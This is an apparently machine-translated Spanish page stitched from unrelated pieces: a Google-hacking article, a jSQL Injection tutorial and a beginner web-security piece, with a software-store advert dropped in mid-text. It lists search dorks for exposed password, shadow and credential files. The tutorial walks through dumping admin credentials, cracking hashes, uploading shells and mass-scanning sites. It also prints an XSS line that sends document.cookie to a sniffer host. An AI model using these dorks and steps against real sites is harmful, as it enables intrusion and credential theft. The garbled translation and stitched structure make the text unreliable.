3. Es posible que no necesite que Google indexe su sitio o parte de él.

Google le permite eliminar un enlace a su sitio o parte de él de su base de datos, así como también eliminar páginas del caché. Además, puede prohibir la búsqueda de imágenes en su sitio, prohibir la visualización de fragmentos cortos de páginas en los resultados de búsqueda Todas las posibilidades para eliminar un sitio se describen en la página http://www.google.com/remove.html. Para ello, debe confirmar que es realmente el propietario de este sitio o insertar etiquetas en la página o

4. Usa robots.txt

Se sabe que los motores de búsqueda examinan el archivo robots.txt en la raíz del sitio y no indexan aquellas partes que están marcadas con la palabra Rechazar. Puede usar esto para evitar que se indexe parte del sitio. Por ejemplo, para evitar indexar todo el sitio, cree un archivo robots.txt que contenga dos líneas:

Agente de usuario: *
rechazar: /

que mas pasa

Para que la vida no te parezca miel, al final diré que hay sitios que siguen a esas personas que, usando los métodos anteriores, buscan agujeros en los scripts y servidores WEB. Un ejemplo de una página de este tipo es

Apéndice.

un poco dulce Prueba uno de los siguientes por ti mismo:

1. #mysql dump filetype:sql - busca volcados de bases de datos datos MySQL
2. Informe resumido de vulnerabilidades del host: le mostrará qué vulnerabilidades han encontrado otras personas
3. phpMyAdmin ejecutándose en inurl:main.php - esto obligará a cerrar el control a través del panel phpmyadmin
4. No para distribución confidencial
5. Variables del servidor del árbol de control de detalles de la solicitud
6. Correr en modo niño
7. Este informe fue generado por WebLog
8. intitle:index.of cgiirc.config
9. tipo de archivo: conf inurl: firewall -intitle: cvs - ¿tal vez alguien necesita archivos de configuración de firewall? :)
10. intitle:index.of finances.xls - hmm....
11. intitle:Índice de chats dbconvert.exe - registros de chat icq
12. intext:Análisis de tráfico de Tobias Oetiker
13. intitle:Estadísticas de uso generadas por Webalizer
14. intitle:estadísticas de estadísticas web avanzadas
15. intitle:index.of ws_ftp.ini - configuración ws ftp
16. inurl:ipsec.secrets contiene secretos compartidos - clave secreta - buen hallazgo
17. inurl:main.php Bienvenido a phpMyAdmin
18. inurl:server-info Información del servidor Apache
19. sitio: calificaciones de administrador de edu
20. ORA-00921: fin inesperado del comando SQL: obtener rutas
21. intitle:index.of trillian.ini
22. intitle:Índice de pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:lista de contraseñas.txt
26. intitle:Índice de .mysql_history
27. intitle:índice de intext:globals.inc
28. intitle:índice.de administradores.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl: ejecutar tipo de archivo: ini

  • "Hackear con Google"
  • Centro de formación "Informzaschita" http://www.itsecurity.ru - un centro especializado líder en el campo de la educación seguridad de información(Licencia del Comité de Educación de Moscú No. 015470, Acreditación Estatal No. 004251). El único centro de formación autorizado de Internet Security Systems y Clearswift en Rusia y los países de la CEI. Centro de formación autorizado por Microsoft (especialización en Seguridad). Los programas de formación se coordinan con la Comisión Técnica Estatal de Rusia, FSB (FAPSI). Certificados de formación y documentos estatales sobre formación avanzada.

    La tecla programable es servicio único para compradores, desarrolladores, distribuidores y socios afiliados. Además, esta es una de las mejores tiendas de software en línea en Rusia, Ucrania, Kazajstán, que ofrece a los clientes una amplia gama, muchos métodos de pago, procesamiento de pedidos rápido (a menudo instantáneo), seguimiento del proceso de cumplimiento de pedidos en la sección personal, varios descuentos de la tienda y fabricantes ON.

    Ejecutar archivo descargado haga doble clic(Debe tener máquina virtual ).

    3. Anonimato al revisar el sitio en busca de inyecciones de SQL

    Configuración de Tor y Privoxy en Kali Linux

    [Sección en desarrollo]

    Configuración de Tor y Privoxy en Windows

    [Sección en desarrollo]

    Configuración del proxy de inyección jSQL

    [Sección en desarrollo]

    4. Comprobación del sitio en busca de inyección SQL con jSQL Injection

    Trabajar con el programa es extremadamente simple. Simplemente ingrese la dirección del sitio y presione ENTER.

    La siguiente captura de pantalla muestra que el sitio es vulnerable a tres tipos de inyecciones SQL a la vez (la información sobre ellas se indica en la esquina inferior derecha). Al hacer clic en los nombres de las inyecciones, puede cambiar el método utilizado:

    Además, ya hemos mostrado las bases de datos existentes.

    Puedes ver el contenido de cada tabla:

    Normalmente, la parte más interesante de las tablas son las credenciales de administrador.

    Si tiene suerte y encontró los datos del administrador, entonces es demasiado pronto para alegrarse. También debe encontrar el panel de administración, donde ingresar estos datos.

    5. Busque administradores con jSQL Injection

    Para hacer esto, vaya a la siguiente pestaña. Aquí nos encontramos con una lista de posibles direcciones. Puede seleccionar una o más páginas para comprobar:

    La conveniencia es que no necesita usar otros programas.

    Desafortunadamente, no hay muchos programadores descuidados que almacenen contraseñas en texto claro. Muy a menudo en la cadena de contraseña vemos algo como

    8743b52063cd84097a65d1633f5c74f5

    Esto es un hachís. Puedes descifrarlo con fuerza bruta. Y… jSQL Injection tiene un sistema de fuerza bruta incorporado.

    6. Hashes de fuerza bruta con jSQL Injection

    La conveniencia indudable es que no necesita buscar otros programas. Hay soporte para muchos de los hashes más populares.

    Esta no es la mejor opción. Para convertirse en un gurú en el descifrado de hashes, se recomienda el libro "" en ruso.

    Pero, por supuesto, cuando no hay otro programa a mano o no hay tiempo para estudiar, jSQL Injection con una función de fuerza bruta incorporada será útil.

    Hay configuraciones: puede establecer qué caracteres se incluyen en la contraseña, el rango de longitud de la contraseña.

    7. Operaciones de archivo después de la detección de inyección SQL

    Además de las operaciones con bases de datos, leyéndolas y modificándolas, si se detectan inyecciones de SQL, se pueden realizar las siguientes operaciones con archivos:

    • leer archivos en el servidor
    • subir nuevos archivos al servidor
    • Subiendo shells al servidor

    ¡Y todo esto está implementado en jSQL Injection!

    Existen limitaciones: el servidor SQL debe tener privilegios de archivo. Razonable administradores del sistema están deshabilitados y el acceso a sistema de archivos no se puede obtener

    La presencia de privilegios de archivo es bastante fácil de verificar. Vaya a una de las pestañas (leer archivos, crear un shell, cargar un nuevo archivo) e intente realizar una de las operaciones indicadas.

    Otra nota muy importante: necesitamos saber la ruta absoluta exacta al archivo con el que trabajaremos; de lo contrario, nada funcionará.

    Mira la siguiente captura de pantalla:

    Cualquier intento de operar sobre un archivo es respondido por: Sin privilegio de ARCHIVO(sin privilegios de archivo). Y aquí no se puede hacer nada.

    Si en cambio tienes otro error:

    Problema al escribir en [directory_name]

    Esto significa que especificó incorrectamente la ruta absoluta donde desea escribir el archivo.

    Para asumir un camino absoluto, uno debe al menos saber Sistema operativo en el que se ejecuta el servidor. Para hacer esto, cambie a la pestaña Red.

    Tal entrada (cadena Win64) nos da razones para suponer que estamos tratando con el sistema operativo Windows:

    Keep-Alive: timeout=5, max=99 Servidor: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Conexión: Keep-Alive Método: HTTP/1.1 200 OK Longitud del contenido: 353 Fecha: viernes, 11 de diciembre de 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tipo de contenido: texto/html; conjunto de caracteres = UTF-8

    Aquí tenemos algo de Unix (*BSD, Linux):

    Codificación de transferencia: fragmentada Fecha: viernes, 11 de diciembre de 2015 11:57:02 GMT Método: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Desarrollado por: PHP/5.3.29 Servidor: Apache/2.2.31 (Unix)

    Y aquí tenemos CentOS:

    Método: HTTP/1.1 200 OK Caduca: jueves, 19 de noviembre de 1981 08:52:00 GMT Establecer-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; ruta=/ Conexión: keep-alive X-Cache-Lookup: MISS de t1.hoster.ru:6666 Servidor: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS de t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Fecha: viernes, 11 de diciembre de 2015 12:08:54 GMT Codificación de transferencia: tipo de contenido fragmentado: texto/html; conjunto de caracteres = WINDOWS-1251

    En Windows, una carpeta de sitio típica es C:\Servidor\datos\htdocs\. Pero, de hecho, si alguien "pensó" en hacer un servidor en Windows, entonces, muy probablemente, esta persona no haya oído nada sobre los privilegios. Por tanto, deberías empezar a probar directamente desde el directorio C:/Windows/:

    Como puedes ver, todo salió perfecto la primera vez.

    Pero los propios shells de jSQL Injection plantean mis dudas. Si tiene privilegios de archivo, entonces puede cargar algo con una interfaz web.

    8. Comprobación masiva de sitios para inyecciones de SQL

    E incluso jSQL Injection tiene esta característica. Todo es extremadamente simple: cargue una lista de sitios (se puede importar desde un archivo), seleccione aquellos que desea verificar y haga clic en el botón correspondiente para iniciar la operación.

    Salida por inyección jSQL

    jSQL Injection es una buena y poderosa herramienta para encontrar y luego usar las inyecciones de SQL que se encuentran en los sitios. Sus ventajas indudables: facilidad de uso, funciones relacionadas integradas. jSQL Injection puede ser el mejor amigo de un principiante cuando analiza sitios web.

    De las deficiencias, señalaría la imposibilidad de editar bases de datos (al menos no encontré esta funcionalidad). Como ocurre con todas las herramientas con interfaz gráfica, la imposibilidad de uso en scripts puede atribuirse a las desventajas de este programa. Sin embargo, también es posible cierta automatización en este programa, gracias a la función integrada de verificación masiva del sitio.

    jSQL Injection es mucho más conveniente de usar que sqlmap. Pero sqlmap admite más tipos de inyección de SQL, tiene opciones de firewall de archivos y algunas otras características.

    En pocas palabras: jSQL Injection es el mejor amigo de un hacker principiante.

    Puede encontrar ayuda para este programa en la Enciclopedia Kali Linux en esta página: http://kali.tools/?p=706

    Decidí hablar un poco sobre seguridad de la información. El artículo será útil para los programadores novatos y aquellos que acaban de empezar a hacer desarrollo Frontend. ¿Cuál es el problema?

    Muchos desarrolladores novatos son tan adictos a escribir código que se olvidan por completo de la seguridad de su trabajo. Y lo más importante, se olvidan de vulnerabilidades como la consulta SQL, XXS. También crean contraseñas fáciles para sus paneles administrativos y están sujetos a la fuerza bruta. ¿Qué son estos ataques y cómo se pueden evitar?

    inyección SQL

    La inyección de SQL es el tipo más común de ataque a la base de datos que se lleva a cabo con una consulta SQL para un DBMS específico. Muchas personas e incluso grandes empresas sufren este tipo de ataques. La razón es el error de un desarrollador al escribir una base de datos y, de hecho, consultas SQL.

    Un ataque de tipo inyección SQL es posible debido al procesamiento incorrecto de los datos de entrada utilizados en las consultas SQL. Con un ataque exitoso por parte de un pirata informático, corre el riesgo de perder no solo el contenido de las bases de datos, sino también las contraseñas y los registros del panel administrativo, respectivamente. Y estos datos serán suficientes para apoderarse por completo del sitio o realizar ajustes irreversibles en él.

    El ataque se puede reproducir con éxito en scripts escritos en PHP, ASP, Perl y otros lenguajes. El éxito de este tipo de ataques depende más de qué DBMS se utilice y de cómo se implemente el escenario en sí. Hay muchos sitios vulnerables para inyecciones de SQL en el mundo. Esto es fácil de verificar. Es suficiente ingresar "idiotas": estas son solicitudes especiales para encontrar sitios vulnerables. Éstos son algunos de ellos:

    • inurl:index.php?id=
    • inurl:entrenadores.php?id=
    • inurl:comprar.php?categoría=
    • inurl:artículo.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:juegos.php?id=
    • inurl:página.php?archivo=
    • inurl:noticiasDetalle.php?id=
    • inurl:gallery.php?id=
    • inurl:artículo.php?id=

    ¿Cómo usarlos? Basta con ingresarlos en el motor de búsqueda de Google o Yandex. El motor de búsqueda le dará no solo un sitio vulnerable, sino también una página para esta vulnerabilidad. Pero no nos detendremos allí y nos aseguraremos de que la página sea realmente vulnerable. Para ello basta con poner una comilla simple “‘” después del valor “id=1”. Algo como esto:

    • inurl:juegos.php?id=1'

    Y el sitio nos dará un error sobre la consulta SQL. ¿Qué necesita nuestro hacker a continuación?

    Y luego necesita este mismo enlace a la página con un error. Luego, el trabajo sobre la vulnerabilidad en la mayoría de los casos se lleva a cabo en la distribución "Kali linux" con sus utilidades para esta parte: la introducción del código de inyección y la realización de las operaciones necesarias. Cómo sucederá esto, no puedo decírtelo. Pero puedes encontrar información sobre esto en Internet.

    Ataque XSS

    Este tipo de ataque se lleva a cabo en Galletas. Ellos, a su vez, son muy aficionados a salvar a los usuarios. ¿Por qué no? ¿Cómo sin ellos? Después de todo, gracias a las cookies, no ingresamos una contraseña de Vk.com o Mail.ru cien veces. Y son pocos los que las rechazan. Pero en Internet, a menudo aparece una regla para los piratas informáticos: el coeficiente de conveniencia es directamente proporcional al coeficiente de inseguridad.

    Para implementar un ataque XSS, nuestro hacker necesita conocimientos de JavaScript. El lenguaje a primera vista es muy simple e inofensivo, ya que no tiene acceso a recursos informáticos. Un hacker puede trabajar con JavaScript solo en un navegador, pero eso es suficiente. Después de todo, lo principal es ingresar el código en la página web.

    No entraré en detalles sobre el proceso de ataque. Diré solo los conceptos básicos y el significado de cómo sucede esto.

    Un hacker puede agregar código JS a algún foro o libro de visitas:

    Los scripts nos redirigen a una página infectada donde se ejecutará el código: ya sea un sniffer, algún tipo de almacenamiento o un exploit que de alguna manera robará nuestras Cookies del caché.

    ¿Por qué JavaScript? Porque JavaScript es excelente con las solicitudes web y tiene acceso a las cookies. Pero si nuestro script nos transferirá a algún sitio, entonces el usuario lo notará fácilmente. Aquí, el hacker usa una opción más astuta: simplemente ingresa el código en la imagen.

    Img=nuevaImagen();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    Simplemente creamos una imagen y le asignamos nuestro script como dirección.

    ¿Cómo protegerse de todo esto? Muy simple: no siga enlaces sospechosos.

    Ataques DoS y DDos


    DoS (del inglés Denial of Service - negación de servicio) ataque de piratas informáticos en un sistema informático con el fin de llevarlo a la falla. Esta es la creación de tales condiciones bajo las cuales los usuarios conscientes del sistema no pueden acceder a la información proporcionada. los recursos del sistema(servidores), o este acceso es difícil. La falla del sistema también puede ser un paso hacia su captura si, en una situación de emergencia, el software entrega información crítica: por ejemplo, la versión, parte del código del programa, etc. Pero la mayoría de las veces es una medida de presión económica: la pérdida de un simple servicio que genera ingresos. Las facturas del proveedor o las medidas para evitar el ataque golpean significativamente el "objetivo" en el bolsillo Actualmente, los ataques DoS y DDoS son los más populares, ya que le permiten hacer que casi cualquier sistema falle sin dejar evidencia legalmente significativa.

    ¿Cuál es la diferencia entre los ataques DoS y DDos?

    DoS es un ataque construido de manera inteligente. Por ejemplo, si el servidor no verifica la exactitud de los paquetes entrantes, un pirata informático puede realizar una solicitud de este tipo que se procesará para siempre y no habrá suficiente tiempo de procesador para trabajar con otras conexiones. En consecuencia, los clientes recibirán una denegación de servicio. Pero no funcionará sobrecargar o deshabilitar grandes sitios conocidos de esta manera. Están armados con canales bastante amplios y servidores súper poderosos que pueden hacer frente fácilmente a tal sobrecarga.

    DDoS es en realidad el mismo ataque que DoS. Pero si en DoS hay un paquete de solicitud, entonces en DDoS puede haber cientos o más de ellos. Es posible que incluso los servidores pesados ​​no puedan hacer frente a tal sobrecarga. Te daré un ejemplo.

    Un ataque DoS es cuando estás teniendo una conversación con alguien, pero luego aparece una persona mal educada y comienza a gritar en voz alta. Hablar es imposible o muy difícil. Solución: llamar a seguridad, que calmará y sacará a la persona de la habitación. Los ataques DDoS son cuando entran miles de personas maleducadas. En este caso, los guardias no podrán girar y llevarse a todos.

    DoS y DDoS se producen desde ordenadores, los llamados zombis. Se trata de equipos de usuarios hackeados por piratas informáticos que ni siquiera sospechan que su máquina está involucrada en el ataque a algún servidor.

    ¿Cómo protegerse de esto? En general, de ninguna manera. Pero puede complicar la tarea de un hacker. Para hacer esto, debe elegir un buen alojamiento con servidores potentes.

    Ataque de fuerza bruta

    Un desarrollador puede idear muchos sistemas de protección contra ataques, revisar completamente los scripts que hemos escrito, revisar el sitio en busca de vulnerabilidades, etc. Pero cuando se trata del último paso del diseño del sitio, es decir, cuando simplemente coloca una contraseña en el panel de administración, puede olvidarse de una cosa. ¡Contraseña!

    No se recomienda establecer una contraseña simple. Puede ser 12345, 1114457, vasya111, etc. No se recomienda establecer contraseñas de menos de 10-11 caracteres. De lo contrario, puede estar sujeto al ataque más común y no complejo: fuerza bruta.

    La fuerza bruta es un ataque de fuerza bruta de contraseña basado en un diccionario que utiliza programas especiales. Los diccionarios pueden ser diferentes: latín, clasificados por números, digamos hasta cierto rango, mixtos (latín + números), e incluso hay diccionarios con símbolos únicos @#4$%&*~~`'”\ ? etc.

    Por supuesto, este tipo de ataque es fácil de evitar, basta con encontrar una contraseña compleja. Incluso el captcha puede salvarte. Y también, si su sitio está hecho en CMS, muchos de ellos calculan un tipo similar de ataque y bloquean ip. Siempre debemos recordar que cuantos más caracteres diferentes haya en la contraseña, más difícil será descifrarla.

    ¿Cómo funcionan los hackers? En la mayoría de los casos, sospechan o ya conocen parte de la contraseña. Es bastante lógico suponer que la contraseña del usuario ciertamente no constará de 3 o 5 caracteres. Tales contraseñas conducen a pirateos frecuentes. Básicamente, los piratas informáticos toman un rango de 5 a 10 caracteres y agregan algunos caracteres que probablemente conocen de antemano. A continuación, genere contraseñas con los rangos deseados. La distribución de Kali Linux incluso tiene programas para estos casos. Y listo, el ataque ya no durará mucho, ya que el volumen del diccionario ya no es tan grande. Además, un pirata informático puede usar el poder de la tarjeta de video. Algunos de ellos son compatibles con el sistema CUDA, mientras que la velocidad de enumeración aumenta hasta 10 veces. Y ahora vemos que el ataque es de una manera sencilla bastante real Pero no solo los sitios están sujetos a la fuerza bruta.

    Estimados desarrolladores, nunca se olviden del sistema de seguridad de la información, porque hoy en día muchas personas, incluidos los estados, sufren este tipo de ataques. Después de todo, la mayor vulnerabilidad es una persona que siempre puede distraerse en algún lugar o pasar por alto en algún lugar. Somos programadores, pero no máquinas programadas. ¡Esté siempre alerta, porque la pérdida de información amenaza con graves consecuencias!